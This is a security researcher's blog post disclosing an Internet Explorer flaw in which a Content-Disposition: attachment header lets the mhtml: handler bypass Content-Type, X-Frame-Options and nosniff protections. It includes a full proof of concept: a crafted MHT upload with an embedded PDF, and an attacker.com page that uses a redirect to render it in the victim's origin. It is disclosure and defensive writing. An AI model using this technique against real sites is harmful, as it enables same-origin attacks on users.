Sunday, January 26, 2020

Internet Explorer mhtml: - Why you should always store user file uploads on another domain


This blogpost is about an issue I discovered some years ago in Internet Explorer. Given that it requires that ActiveX plugins like Adobe PDF or Flash are installed in IE, I feel fine to share it.

The issue is a combination of the old mhtml: protocol handler and the Content-Disposition: attachment header.
I try to keep this blogpost short but I am aware that .MHT and mhtml: are not that well known so I am going to explain it really quickly. In case you are familiar with this feature, you can skip to the end of this blog post.


MHT/MHTML - MIME Encapsulation of Aggregate HTML Documents


For those who have never saved a complete web page in Internet Explorer, mhtml or its extensions .mht is most likely unknown. MHTML stands for MIME Encapsulation of Aggregate HTML Documents. Wikipedia describes it as a "web page archive format used to combine in a single document the HTML code and its companion resources that are otherwise represented by external links (such as images, Flash animations, Java applets, and audio files)".


Filename: test.mht
Content-Type: multipart/related;  
type="text/html";  
boundary="----=_NextPart_000_0015_01D57001.44159140"

This is a multi-part message in MIME format.  
------=_NextPart_000_0015_01D57001.44159140
Content-Type: text/html;  charset="utf-8"
Content-Transfer-Encoding: quoted-printable
Content-Location: test.html

<HTML>
<body>
<h1>32</h1>
</body>
</html>
------=_NextPart_000_0015_01D57001.44159140
Content-Type: text/html;  charset="utf-8"
Content-Transfer-Encoding: quoted-printable
Content-Location: test2.html

<HTML>
<body>
<h1>test2.html</h1>
</body>
</html>
------=_NextPart_000_0015_01D57001.44159140
Content-Type: text/html;  charset="utf-8"
Content-Transfer-Encoding: base64
Content-Location: base64.html

PGgxPmJhc2U2NDwvaDE+
------=_NextPart_000_0015_01D57001.44159140-- 


You can save this structure with a .mht file extension and open it in Internet Explorer. It will render the file and show <h1>32</h1> as it is the first part of the structure
To be able to reference a specific file inside this structure, the mhtml: protocol handler must be used. 

MHTML: Protocol handler 

The general structure of the mhtml: protocol handler looks like this:
mhtml:*Path to MHT file*!*Content-Location name*

Let's assume the example structure shown before is hosted on the following URL:
http://example.com/test.mht


In case the test2.html part of the structure has to be loaded, the full URL must look like this:
mhtml:http://example.com/test.mht!test2.html

This tells IE to render the content of this location:
<h1>test2.html</h1>

In case the base64.html file gets referenced, IE will base64 decode the content before it is rendered. This behavior is controlled via the Content-Transfer-Encoding header.
mhtml:http://example.com/test.mht!base64.html
Base64 decoded HTML structure:
<h1>base64</h1>

These examples only showcased HTML files but the MHTML file structure allows to store any other type of file as well.
It must be noted that in case you want to test these examples, you have to serve the MHT file with the following type. The reason for this necessity will be explained in the next chapter:
Content-Type: message/rfc822

The past and the fix


In the past Internet Explorers mhtml: protocol handler implementation did not enforce strict parsing rules.
This behavior was abused in multiple ways. Developer could use it as a fallback for IE versions, which did not support the data: protocol handler. Attacker abused it to attack websites and introduce XSS vulnerabilities or implemented other attack vectors. The following list is a just short glimpse into the ways the mhtml: protocol handler was abused:

http://www.phpied.com/mhtml-when-you-need-data-uris-in-ie7-and-under/#comment-74091


https://lcamtuf.blogspot.com/2011/03/note-on-mhtml-vulnerability.html


In the end Microsoft deployed a fix, which requires that any MHTML file is served with a Content-Type: message/rfc822 or the mhtml: lookup will no longer work.

Honorable mention:
In 2017 mhtml was abused once again - to trigger a universal XSS vulnerability in Chrome: https://github.com/Bo0oM/CVE-2017-5124

The Bug:  MHTML vs Content-Disposition


I discovered that Internet Explorer will ignore the requirement of the correctly set Content-Type header for MHTML files as soon as a Content-Disposition: attachment header is present in a HTTP response. This is not immediately exploitable. Although it is possible to use mhtml: and load a specific resource inside the structure, IE will still trigger a download.
To bypass this restriction and actually parse the resource in the browser , common Internet Explorer ActiveX plugins like Adobe Flash/PDF can be used.
Internet Explorer allows to enforce the rendering of resources via installed ActiveX plugins by using the embed or object tag, which allow to specify the corresponding content type. This behavior does not only allow to interpret the resource as a MHT file and load a resource (eg flash) but no download is triggered. Most importantly the loaded resource is considered in the origin http://example.com/ as mhtml: is not considered as a part of the Same Origin Policy (*Notes about SOP at the end of this post*):
<embed src="mhtml:http://example.com/test.mht!test.swf" type="application/x-shockwave-flash" />

But this behavior has another side effect, which helps an attacker. IE does not only ignore the Content-Type requirement, it will ignore any other security headers. The most common one used to prevent this attack would be X-Frame-Options: deny, which disallows loading the resource in an iframe, embed, object or frame tag.

Theoretical real world example:

Let's assume example.com has to serve user uploaded files on its own origin, which can be accessed by any authenticated users. It sets the following HTTP headers for these resources to ensure they are never rendered as active content inside the browser.
It does not only enforce a download but it is disallowing framing the resource (X-Frame-Options), sets a fixed and safe type (Content-Type) and disables content type sniffing (X-Content-Type-Options):

<?php
header("Content-Type: text/plain");
header('Content-Disposition: attachment; filename="test.txt"');
header("X-Content-Type-Options: nosniff");
header("X-Frame-Options: deny");
echo file_get_contents("userfile.tmp"); // contains the user controlled content
?>

At first an attacker has to upload a MHTML file to example.com - the following example contains a hello world PDF file, but it can be modified to contain a flash file as well. Let's assume it is stored at http://example.com/user/123/download.php?id=3:

Content-Type: multipart/alternative;
 boundary="----=_NextPart_000_0000_01D56FF0.D41CF780"

This is a multi-part message in MIME format.

------=_NextPart_000_0000_01D56FF0.D41CF780
Content-Type: application/pdf;
 charset="Windows-1252"
Content-Transfer-Encoding: base64
Content-Location: abcd.pdf

JVBERi0xLjEKMSAwIG9iago8PAolCS9UeXBlIC9DYXRhbG9nCgkvUGFnZXMgMiAwIFIKICAgIC9B
Y3JvRm9ybSA1IDAgUgogICAgL09wZW5BY3Rpb24gMTIzIDAgUgo+PgplbmRvYmoKMTIzIDAgb2Jq
Cjw8Ci9UeXBlIC9BY3Rpb24KL1MgL0phdmFTY3JpcHQKL0pTIChhcHAuYWxlcnQoVVJMKSkKPj4K
MiAwIG9iago8PAoJL1R5cGUgL1BhZ2VzCgkvQ291bnQgMQoJL0tpZHMgWyAzIDAgUiBdCj4+CmVu
ZG9iagozIDAgb2JqCjw8CgkvVHlwZSAvUGFnZQoJL0NvbnRlbnRzIDQgMCBSCgkvUGFyZW50IDIg
MCBSCgkvUmVzb3VyY2VzIDw8CgkJL0ZvbnQgPDwKCQkJL0YxIDw8CgkJCQkvVHlwZSAvRm9udAoJ
CQkJL1N1YnR5cGUgL1R5cGUxCgkJCQkvQmFzZUZvbnQgL0FyaWFsCgkJCT4+CgkJPj4KCT4+Cj4+
CmVuZG9iago0IDAgb2JqCjw8IC9MZW5ndGggNDc+PgpzdHJlYW0KQlQKL0YxIDEwMApUZiAxIDEg
MSAxIDEgMApUcihIZWxsbyBXb3JsZCEpVGoKRVQKZW5kc3RyZWFtCmVuZG9iago1IDAgb2JqCjw8
IC9EQSAoL0hlbHYgMCBUZiAwIGcgKSA+PgplbmRvYmoKCnRyYWlsZXIKPDwKCS9Sb290IDEgMCBS
Cj4+CiUlRU9GCiUgYSBuYWl2ZSBQREYgKGZvciBwZGYuanMpIHdpdGggbW9yZSBlbGVtZW50cyB0
aGFuIHVzdWFsbHkgcmVxdWlyZWQKJSBBbmdlIEFsYmVydGluaSwgQlNEIGxpY2VuY2UgMjAxMg==
------=_NextPart_000_0000_01D56FF0.D41CF780--


Now an attacker has to lure an authenticated user of example.com to his own domain eg. attacker.com, which contains the following HTML structure.
Note: The HTML structure does not directly specify the mhtml: protocol handler, because this will trigger Windows Defender in IE - so a HTTP redirect has to be used (yeah annoying).

http://attacker.com/test.html
<h1> MHTML protocol test case 2 </h1>
<embed src="redir.php" type="application/pdf" height="500" width="500"/>

redir.php
header("Location: mhtml:http://example.com/user/123/download.php?id=3!abcd.pdf");

HTTP response
HTTP/1.1 200 OK
Date: Sat, 25 Jan 2020 00:27:39 GMT
Server: Apache/2.4.37 (Debian)
Content-Disposition: attachment; filename="test.txt"
X-Content-Type-Options: nosniff
X-Frame-Options: deny
Content-Length: 1269
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/plain;charset=UTF-8

Content-Type: multipart/alternative;
 boundary="----=_NextPart_000_0000_01D56FF0.D41CF780"

This is a multi-part message in MIME format.

------=_NextPart_000_0000_01D56FF0.D41CF780
Content-Type: application/pdf;
 charset="Windows-1252"
Content-Transfer-Encoding: base64
Content-Location: abcd.pdf

JVBERi0xLjEKMSAwIG9iago8PAolCS9UeXBlIC9DYXRhbG9nCgkvUGFnZXMgMiAwIFIKICAgIC9B
Y3JvRm9ybSA1IDAgUgogICAgL09wZW5BY3Rpb24gMTIzIDAgUgo+PgplbmRvYmoKMTIzIDAgb2Jq
Cjw8Ci9UeXBlIC9BY3Rpb24KL1MgL0phdmFTY3JpcHQKL0pTIChhcHAuYWxlcnQoVVJMKSkKPj4K
MiAwIG9iago8PAoJL1R5cGUgL1BhZ2VzCgkvQ291bnQgMQoJL0tpZHMgWyAzIDAgUiBdCj4+CmVu
ZG9iagozIDAgb2JqCjw8CgkvVHlwZSAvUGFnZQoJL0NvbnRlbnRzIDQgMCBSCgkvUGFyZW50IDIg
MCBSCgkvUmVzb3VyY2VzIDw8CgkJL0ZvbnQgPDwKCQkJL0YxIDw8CgkJCQkvVHlwZSAvRm9udAoJ
CQkJL1N1YnR5cGUgL1R5cGUxCgkJCQkvQmFzZUZvbnQgL0FyaWFsCgkJCT4+CgkJPj4KCT4+Cj4+
CmVuZG9iago0IDAgb2JqCjw8IC9MZW5ndGggNDc+PgpzdHJlYW0KQlQKL0YxIDEwMApUZiAxIDEg
MSAxIDEgMApUcihIZWxsbyBXb3JsZCEpVGoKRVQKZW5kc3RyZWFtCmVuZG9iago1IDAgb2JqCjw8
IC9EQSAoL0hlbHYgMCBUZiAwIGcgKSA+PgplbmRvYmoKCnRyYWlsZXIKPDwKCS9Sb290IDEgMCBS
Cj4+CiUlRU9GCiUgYSBuYWl2ZSBQREYgKGZvciBwZGYuanMpIHdpdGggbW9yZSBlbGVtZW50cyB0
aGFuIHVzdWFsbHkgcmVxdWlyZWQKJSBBbmdlIEFsYmVydGluaSwgQlNEIGxpY2VuY2UgMjAxMg==
------=_NextPart_000_0000_01D56FF0.D41CF780--

Despite all the headers set by example.com, Internet Explorer will render the PDF and show "Hello World". By loading a malicious flash instead of a PDF file, it is possible to interact with example.com in the context of the victim viewing attacker.com, as the rendered resource is still operating in the example.com origin. It must be mentioned that while re-testing this issue, I was only able to reproduce this SOP behavior for flash files but not for PDF files. Adobe Reader would ask me to allow an emtpy (' ') origin to access example.com.